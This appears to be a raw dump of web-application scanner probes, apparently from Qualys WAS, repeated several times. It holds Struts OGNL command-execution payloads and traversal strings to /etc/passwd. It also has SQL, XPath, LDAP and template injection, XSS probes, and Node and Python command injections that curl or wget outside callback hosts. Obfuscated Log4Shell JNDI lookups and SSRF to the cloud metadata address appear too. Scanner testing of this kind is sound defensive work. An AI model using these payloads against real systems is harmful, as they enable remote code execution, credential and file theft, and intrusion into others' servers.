%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
../../../../../../../etc/passwd
1
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
``
1
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
q Qualys_resp_hdr_injection: Vulnerable
1
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
111222
1
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssa0p9h456=7< /script>
1
" onEvent=X171881004Y1_2Z
1
' onEvent=X171881004Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qss0mqSl78J=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(IsnaAQ56)
1
_q=random(X171881004Y1_2Z)
1
_q=random(X171881004Y1_2Z)
1
"'>
1
z-->
1
1"'>
">
1
javascript:qxss(X171881004Y1_2Z);
1
1
" onEvent=X171881004Y1_2Z
1
' onEvent=X171881004Y1_2Z
1
_q=random(X171881004Y1_2Z)
"'>
1
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
__import__('os').popen('sleep 29').read()
1
1
1' + sleep(29*100*Math.sqrt(100)) + '
1'; var djci=sleep(29*1000) + '
1
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1
1' or true() or 'and' = 'and
15 oR 9=8 + 1
1
11 or 11=12
1
1
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1
1 or NULL IS NULL
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1' and 3789=1391 --
1
1
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl cba7afc9e955ce1e9ae74cd5c46ffebc4562ec8c.17977672393642422.1533309299.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget bd574a0bc009206b450ec6239047682eaa0f1154.17977672393642422.975216122.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 7182719a61b319a8dd12df43242ae7c0627b9bf2.17977672393642422.4146570225.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl aa60fae1191091070fc3bf92eccdb01f5703501a.17977672393642422.709966111.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 0a79c2f5843b1e76bd4d19fa5b0ee5218dcf74f6.17977672393642422.1139141764.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","0695bf2c951c6b78540083f7bd5c84aea19bf563.17977672393642422.3189114811.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://bc5c1a41c936c25983c0c8f058a8b68d4327f0d2.17977672393642422.2916397690.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://ab31ccb90b1eb0099ba8aa1328609273f4e6d945.17977672393642422.48600742.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//7be5ff2a262fccc39e2712a224fd0e9710bae189.17977672393642422.1138157714.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://646377964e99c67b5e3f78cbb96b8aa7035ed4a7.17977672393642422.2146380909.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//e9ca9cb2206eea378cda21f9508d0008064b7afb.17977672393642422.734131748.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://aca67e2a802009300e4a1059544263e656b6bebd.17977672393642422.4277646196.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//b8d0133c19bdc400393ece404e8fe79c2ba5ac44.17977672393642422.2593811444.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://d52738a70dec39f2a40e175b5a998dbb6a89afa5.17977672393642422.1040548440.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://16bc4daf83614503d0a541880f2f2fb54fc655eb.17977672393642422.3733096075.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://7960596a3bf669fd8c0be8105d50729660d29b94.17977672393642422.2867009608.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://97803e74cb23c62c46fe303ae5714d2a8f92dc10.17977672393642422.4239391712.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
d3bd85b731a8d84ac59ea2a5e2eaa376bcab9863.17977672393642422.569431178.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://0c498920d9a9eb378b34c1b5304e9073b30b8237.17977672393642422.613567330.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@bd0d134e92d43c1a77aae6e9ca0611f74926ab70.17977672393642422.3492295345.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1)(attribute2=*)
1
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxssdX5FH78J};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssl2f44XSA()-"
1
'-qxssaYkVdNGK()-'
*/;(function(){qxssNe8E191S});/*
1
1
9 ;(function(){qxssDH1D4vfn});//
1
9;(function(){qxss0zK4NW5o});//
1
';(function(){qxsstDA82R6A});/**/'
1
qualys(aqxss36GZwOR5)xyz
1
");(function(){qxssS0A7Js7c});/**/"
1
";(function(){qxssKrG47lmT});/**/"
1
javascript:qxss(X2995829340Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
,
1
1
``
/*
1
#
1
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qss3Z03YCT4=7< /script>
1
" onEvent=X2995829340Y1_2Z
1
' onEvent=X2995829340Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qss2E505e91=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(7079551L)
1
_q=random(X2995829340Y1_2Z)
1
_q=random(X2995829340Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X2995829340Y1_2Z);
1
" onEvent=X2995829340Y1_2Z
1
' onEvent=X2995829340Y1_2Z
1
_q=random(X2995829340Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1WAITFOR DELAY '00:00:29'
1
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
11 or 11=12
1
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1 or NULL IS NULL
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1' and 3789=1391 --
1
1
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
http://localhost:19096
1
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl da9d314c0d70e8ec4327a05190ec7ce0aed56c7e.17891305393642422.2595863387.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 7ae82d15bd75c7a12d5eb6599da22057e921a7eb.17891305393642422.1834637739.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl ae9f6fddf9c6fce3c05fa258a4e97e3785112b88.17891305393642422.1026459713.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl b42f815b9fcee11c18f51e20aa0abe17b82c1eca.17891305393642422.2087243676.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl e340461c46e6caf1574201ecb10553bceee8fed7.17891305393642422.2074856950.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","28e4ec86f9432ee544355c15bb0b6551d31ed354.17891305393642422.692130469.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://dbf7c499244fd71979545025f959be458201a540.17891305393642422.2707349602.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://df52245d4ae8ab101b7dac91c294edfbf36f8e8e.17891305393642422.264924043.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//ff506644794217feca3a9d49339e999c276f9b64.17891305393642422.2358333960.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://fd01499e7497da895a1aaa027b4d23377470787c.17891305393642422.4048291153.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//cd689f3a4fbdfc30144e31b78d3753fe8c67d7cb.17891305393642422.1716846650.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://194a65ad459268d7723e6c8a37c379bdb1649842.17891305393642422.2745335540.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//05124ed793d7da1fd59149cfbbf6f31edb204b40.17891305393642422.123898071.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://7fe014cee5437c998548fd9688b2f2e13ba39ad9.17891305393642422.2017076138.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://8349f84d392a324e9fcf687a38ac8771ba54dbff.17891305393642422.86012988.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://8c0ff58813871a65cb1ad10a24f030a3c391c72f.17891305393642422.1442734784.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://39ce4cbc1e157cf4677407c1af4718df65e25086.17891305393642422.577966841.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
0f52e3368a5e06e7a38cfd615cb504876c1739ad.17891305393642422.3097865060.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://8303665a901ec2eb545f1e649de1d8dfeee92ea4.17891305393642422.2392059140.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@aae43e078851e325d854ac940c68602cea1c6b3f.17891305393642422.3576434023.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss8lrZ8BsL};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssV5vPOxUx()-"
1
'-qxssbhmT6b6f()-'
1
*/;(function(){qxssH1LOf6v7});/*
1
9 ;(function(){qxss256cS5V9});//
1
9;(function(){qxss56n42zI1});//
1
';(function(){qxssckg5wwt9});/**/'
1
qualys(aqxssqMv020U7)xyz
1
");(function(){qxss8VpnnZ21});/**/"
1
";(function(){qxssc0712oax});/**/"
1
javascript:qxss(X152960452Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
111222
1
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssPisnRdMF=7< /script>
1
" onEvent=X152960452Y1_2Z
1
' onEvent=X152960452Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qssrmJo2ZQg=7")}
1">
1
1
1
1
"'>
1
1
1
1
1 _q_q=random(L2nQr5vy)
1
_q=random(X152960452Y1_2Z)
_q=random(X152960452Y1_2Z)
1
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X152960452Y1_2Z);
1
" onEvent=X152960452Y1_2Z
1
' onEvent=X152960452Y1_2Z
1
_q=random(X152960452Y1_2Z)
"'>
1
1
This is a test input.
This is a test input.
This is a test input.
This is a test input.
This is a test input.
This is a test input.
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
